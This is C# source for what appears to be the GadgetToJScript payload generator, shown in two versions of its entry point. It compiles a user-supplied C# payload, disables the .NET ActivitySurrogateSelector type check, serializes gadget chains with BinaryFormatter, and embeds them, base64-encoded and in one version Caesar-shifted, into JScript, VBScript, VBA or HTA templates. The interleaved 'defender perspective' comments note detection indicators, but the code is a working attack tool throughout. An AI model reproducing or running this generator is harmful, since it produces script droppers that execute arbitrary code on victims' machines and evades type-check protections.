        /// <summary>
        /// Entry point: reads the embedded "SourceCode" and "Template" manifest resources,
        /// produces two serialized gadget stages, substitutes their (base64, then shifted)
        /// text and sizes into the template and writes the result to
        /// "&lt;current dir&gt;/&lt;process name&gt;.js".
        /// </summary>
        /// <remarks>
        /// Review notes (defender perspective):
        /// - The app setting "microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck"
        ///   is forced to "true" at runtime before any gadget is generated. That is the .NET Framework
        ///   switch controlling the ActivitySurrogateSelector type check; a process toggling it
        ///   programmatically is itself a useful hunting/detection indicator.
        /// - Stage two is serialized with <see cref="BinaryFormatter"/>, which Microsoft documents as
        ///   unsafe for any untrusted input and has removed from .NET 9; consumers must never
        ///   deserialize data of unknown origin with it.
        /// - <c>CaesarShift(..., 12)</c> (defined outside this block) is applied to base64 text; a
        ///   fixed-shift substitution is obfuscation only and is trivially reversible, so the emitted
        ///   script remains fully inspectable for analysis.
        /// - Helpers <c>DisableTypeCheckGadgetGenerator</c>, <c>InternalCompiler</c> and
        ///   <c>SurrogateGadgetGenerator</c> are not visible here; their contracts are assumed, not verified.
        /// </remarks>
        static void Main()
        {
            string source;
            string template;

            // GetManifestResourceStream returns null when the resource is absent; the StreamReader
            // constructor would then throw ArgumentNullException — there is no friendlier check.
            using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("SourceCode"))
            {
                using (StreamReader sr = new StreamReader(stream))
                {
                    source = sr.ReadToEnd();
                }
            }

            // Same pattern for the output template (same null-resource caveat).
            using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("Template"))
            {
                using (StreamReader sr = new StreamReader(stream))
                {
                    template = sr.ReadToEnd();
                }
            }

            // Process-wide configuration change; it persists for the lifetime of this process.
            ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
            DisableTypeCheckGadgetGenerator dtcgg = new DisableTypeCheckGadgetGenerator();
            // Stage one: the helper receives an empty MemoryStream and returns the stream to use
            // (whether it is the same instance is not visible from here).
            MemoryStream stageOne = dtcgg.generateGadget(new MemoryStream());

            // Placeholder substitution; %SIZE_OF_STAGE_1% is the raw byte length, not the encoded length.
            template = template.Replace("%STAGE_1%", CaesarShift(Convert.ToBase64String(stageOne.ToArray()), 12));
            template = template.Replace("%SIZE_OF_STAGE_1%", stageOne.Length.ToString());
            // Compiles the embedded source text into an Assembly; implementation not shown.
            Assembly                 assembly = InternalCompiler.compile(source);
            // NOTE(review): BinaryFormatter is the insecure legacy serializer (see remarks above).
            BinaryFormatter          bf       = new BinaryFormatter();
            MemoryStream             stageTwo = new MemoryStream();
            SurrogateGadgetGenerator sgg      = new SurrogateGadgetGenerator(assembly);

            // Stage two is the BinaryFormatter graph of the surrogate generator object.
            bf.Serialize(stageTwo, sgg);
            template = template.Replace("%STAGE_2%", CaesarShift(Convert.ToBase64String(stageTwo.ToArray()), 12));
            template = template.Replace("%SIZE_OF_STAGE_2%", stageTwo.Length.ToString());
            // Output lands in the working directory (not the executable's directory), named after the
            // running process; an existing file of that name is overwritten without prompting.
            File.WriteAllText(Path.Combine(Directory.GetCurrentDirectory(), Process.GetCurrentProcess().ProcessName + ".js"), template);
        }
        /// <summary>
        /// Entry point: parses command-line options into static fields declared outside this block
        /// (<c>_inputFName</c>, <c>_references</c>, <c>_wsh</c>, <c>_enc</c>, <c>_outputFName</c>,
        /// <c>_regFree</c>), selects an embedded script template by script type, produces two
        /// serialized gadget stages, substitutes them into the template and writes
        /// "&lt;_outputFName&gt;.&lt;_wsh&gt;".
        /// </summary>
        /// <param name="args">Raw command-line arguments, handed to <c>OptionSet.Parse</c>.</param>
        /// <remarks>
        /// Review notes (defender perspective):
        /// - The app setting "microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck"
        ///   is forced to "true" at runtime (after stage one, before compilation and serialization).
        ///   That is the .NET Framework switch controlling the ActivitySurrogateSelector type check;
        ///   a process toggling it programmatically is a useful hunting/detection indicator.
        /// - Stage two is serialized with <see cref="BinaryFormatter"/>, which Microsoft documents as
        ///   unsafe for untrusted input and has removed from .NET 9.
        /// - The manifest resource names ("GadgetToJScript.templates.*") and placeholder tokens
        ///   ("%_STAGE1_%", "%_STAGE2_%", ...) are fixed strings embedded in the binary and are
        ///   reasonable anchors for static detection of this tool.
        /// - The blank-string checks below assume the option fields default to "" (declarations are not
        ///   visible); if they default to null the checks are bypassed and failure surfaces later.
        /// - <c>ShowHelp</c>, <c>SplitToLines</c>, <c>AssemblyLoader</c>, <c>EWSH</c>, <c>ENC</c>,
        ///   <c>DisableTypeCheckGadgetGenerator</c> and <c>ASurrogateGadgetGenerator</c> are defined
        ///   outside this block; their contracts are assumed here, not verified.
        /// </remarks>
        static void Main(string[] args)
        {
            var show_help = false;

            // Each option writes straight into a static field; the lambdas for the two flags
            // ("regfree", "help") receive null when the flag is absent.
            OptionSet options = new OptionSet()
            {
                { "i|input=", "Input file, example: C:\\Users\\userX\\Desktop\\payload.cs", v => _inputFName = v },
                { "r|references=", "Reference Assemblies, example: System.dll,System.IO.Compression.dll", v => _references = v },
                { "w|scriptType=", "js, vbs, vba or hta", v => _wsh = v },
                { "e|encodeType=", "VBA gadgets encoding: b64 or hex (default set to b64)", v => _enc = v },
                { "o|output=", "Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v => _outputFName = v },
                { "f|regfree", "Registration-free activation of .NET based COM components", v => _regFree = v != null },
                { "h|?|help", "Show Help", v => show_help = v != null },
            };

            try
            {
                options.Parse(args);

                if (show_help)
                {
                    ShowHelp(options);
                    return;
                }

                // Required options: script type, output name and input file (empty-string check only).
                if (_wsh == "" || _outputFName == "" || _inputFName == "")
                {
                    ShowHelp(options);
                    return;
                }

                // Enum.IsDefined with a string is a case-sensitive name lookup, so "JS" is rejected.
                if (!Enum.IsDefined(typeof(EWSH), _wsh))
                {
                    ShowHelp(options);
                    return;
                }

                if (!Enum.IsDefined(typeof(ENC), _enc))
                {
                    ShowHelp(options);
                    return;
                }
            }
            // NOTE(review): catches every exception type from parsing/validation and reports only the
            // message; a narrower catch (e.g. the option-parsing exception type) would be more precise.
            catch (Exception e)
            {
                Console.Error.WriteLine(e.Message);
                ShowHelp(options);
                return;
            }

            string resourceName = "";

            // Template selection. The default arm duplicates the "js" arm; it is only reachable for an
            // EWSH member name not listed below (if any exists — EWSH is declared elsewhere).
            switch (_wsh)
            {
            case "js":
                if (_regFree)
                {
                    resourceName = "GadgetToJScript.templates.jscript-regfree.template";
                }
                else
                {
                    resourceName = "GadgetToJScript.templates.jscript.template";
                }
                break;

            case "vbs":
                resourceName = "GadgetToJScript.templates.vbscript.template";
                break;

            case "vba":
                // Any ENC value other than "b64" selects the hex template.
                if (_enc == "b64")
                {
                    resourceName = "GadgetToJScript.templates.vbascriptb64.template";
                }
                else
                {
                    resourceName = "GadgetToJScript.templates.vbascripthex.template";
                }
                break;

            case "hta":
                resourceName = "GadgetToJScript.templates.htascript.template";
                break;

            default:
                if (_regFree)
                {
                    resourceName = "GadgetToJScript.templates.jscript-regfree.template";
                }
                else
                {
                    resourceName = "GadgetToJScript.templates.jscript.template";
                }
                break;
            }

            MemoryStream _msStg1 = new MemoryStream();
            DisableTypeCheckGadgetGenerator _disableTypCheckObj = new DisableTypeCheckGadgetGenerator();

            // Stage one: the empty stream passed in is replaced by whatever GenerateGadget returns.
            _msStg1 = _disableTypCheckObj.GenerateGadget(_msStg1);

            // Process-wide configuration change; persists for the lifetime of this process.
            ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");

            // Compiles the user-supplied source file against the comma-separated reference list;
            // implementation not shown.
            Assembly testAssembly = AssemblyLoader.Compile(_inputFName, _references);

            // NOTE(review): BinaryFormatter is the insecure legacy serializer (see remarks above).
            BinaryFormatter           _formatterStg2 = new BinaryFormatter();
            MemoryStream              _msStg2        = new MemoryStream();
            ASurrogateGadgetGenerator _gadgetStg     = new ASurrogateGadgetGenerator(testAssembly);

            // Stage two is the BinaryFormatter graph of the surrogate generator object.
            _formatterStg2.Serialize(_msStg2, _gadgetStg);

            Assembly assembly     = Assembly.GetExecutingAssembly();
            string   _wshTemplate = "";

            // Null if the resource is missing; the StreamReader constructor would then throw.
            using (Stream stream = assembly.GetManifestResourceStream(resourceName))
            {
                if (_wsh != "vba")
                {
                    // js / vbs / hta: single base64 blob per stage plus raw byte lengths.
                    using (StreamReader reader = new StreamReader(stream))
                    {
                        _wshTemplate = reader.ReadToEnd();
                        _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", Convert.ToBase64String(_msStg1.ToArray()));
                        _wshTemplate = _wshTemplate.Replace("%_STAGE1Len_%", _msStg1.Length.ToString());
                        _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", Convert.ToBase64String(_msStg2.ToArray()));
                        _wshTemplate = _wshTemplate.Replace("%_STAGE2Len_%", _msStg2.Length.ToString());
                    }
                }
                else
                {
                    // vba: the encoded stages are chunked into 100-character lines and emitted as a
                    // sequence of string-concatenation statements (VBA line-length limits, presumably).
                    // These initial lists are immediately overwritten below.
                    List <string> stage1Lines = new List <String>();
                    List <string> stage2Lines = new List <String>();

                    if (_enc == "b64")
                    {
                        stage1Lines = SplitToLines(Convert.ToBase64String(_msStg1.ToArray()), 100).ToList();
                        stage2Lines = SplitToLines(Convert.ToBase64String(_msStg2.ToArray()), 100).ToList();
                    }
                    else
                    {
                        // BitConverter.ToString yields "AA-BB-..."; stripping the dashes leaves plain hex.
                        stage1Lines = SplitToLines(BitConverter.ToString(_msStg1.ToArray()).Replace("-", ""), 100).ToList();
                        stage2Lines = SplitToLines(BitConverter.ToString(_msStg2.ToArray()).Replace("-", ""), 100).ToList();
                    }

                    // First chunk initialises the variable; the rest append. Indexing [0] assumes
                    // SplitToLines returned at least one line (it is not visible here) — an empty
                    // stage would throw ArgumentOutOfRangeException.
                    StringBuilder _b1 = new StringBuilder();
                    _b1.Append("stage_1 = \"").Append(stage1Lines[0]).Append("\"");
                    _b1.AppendLine();
                    stage1Lines.RemoveAt(0);

                    foreach (String line in stage1Lines)
                    {
                        // line.ToString() on a string is a no-op; only Trim() has an effect.
                        _b1.Append("stage_1 = stage_1 & \"").Append(line.ToString().Trim()).Append("\"");
                        _b1.AppendLine();
                    }

                    StringBuilder _b2 = new StringBuilder();
                    _b2.Append("stage_2 = \"").Append(stage2Lines[0]).Append("\"");
                    _b2.AppendLine();
                    stage2Lines.RemoveAt(0);

                    foreach (String line in stage2Lines)
                    {
                        _b2.Append("stage_2 = stage_2 & \"").Append(line.ToString().Trim()).Append("\"");
                        _b2.AppendLine();
                    }

                    // The vba templates carry no length placeholders; only the two stage tokens are replaced.
                    using (StreamReader reader = new StreamReader(stream))
                    {
                        _wshTemplate = reader.ReadToEnd();
                        _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", _b1.ToString());
                        _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", _b2.ToString());
                    }
                }
            }

            // Output extension is the script type itself; an existing file is overwritten without prompting.
            using (StreamWriter _generatedWSH = new StreamWriter(_outputFName + "." + _wsh))
            {
                _generatedWSH.WriteLine(_wshTemplate);
            }
        }